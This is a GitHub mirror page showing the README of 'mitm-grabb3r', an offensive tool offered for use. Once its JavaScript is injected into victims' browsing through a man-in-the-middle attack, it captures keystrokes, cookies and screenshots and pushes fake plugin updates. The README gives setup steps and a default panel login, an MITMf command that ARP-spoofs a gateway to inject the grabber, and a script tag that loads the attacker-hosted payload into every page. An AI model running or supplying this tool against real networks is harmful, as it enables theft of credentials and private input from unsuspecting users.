GithubHelp home page GithubHelp logo

add1ct3d / mitm-grabb3r Goto Github PK

View Code? Open in Web Editor NEW

This project forked from infinitedevelopment/mitm-grabb3r

0.0 0.0 0.0 5.99 MB

MITM GRABB3R

Python 0.17% CSS 10.88% JavaScript 47.80% HTML 38.45% PHP 2.70%

mitm-grabb3r's Introduction

version

MITM GRABB3R is a PHP (MySQL) script that uses Javascript code to do various XSS "attacks" after you inject it via mitm attack.

INFO

This script can capture keystrokes of user input on websites,capture cookies, capture screenshots of pages and run fake browser plugin update.

Each clients history and captures can be viewed on a timeline.

"DEMO"

HOW TO SET SCRIPT

Create and import database.sql in MySQL

Upload php script from www to folder on your http server.

Edit

/includes/settings.ini.php
/includes/config.ini.php

Make sure /capture/scr/ is writable folder.

Default web login is:

Username:admin
Password:1234

HOW TO: MITMf

Replace inject.py in plugins folder ( MITMf 0.9.8 ) with inject.py that contains small changes.

Example cmd:

python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --inject --grabber-url http://192.168.1.5/mitm/inject.php

Use other MITM software?

This script was tested on and used with MITMf but should be able to use it without any issues with other software.

If you make plugin for other software contact me and i will add plugin for it.

You need to inject code bellow into every page and then wait for data in panel.

<script type="text/javascript" src="http://IP_OR_DOMAIN_AND_SCRIPT_PATH/inject.php?ip=IP_ADDRESS_OF_VICTIM"></script>

Contact

Twitter: @ivangr0zni

mitm-grabb3r's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.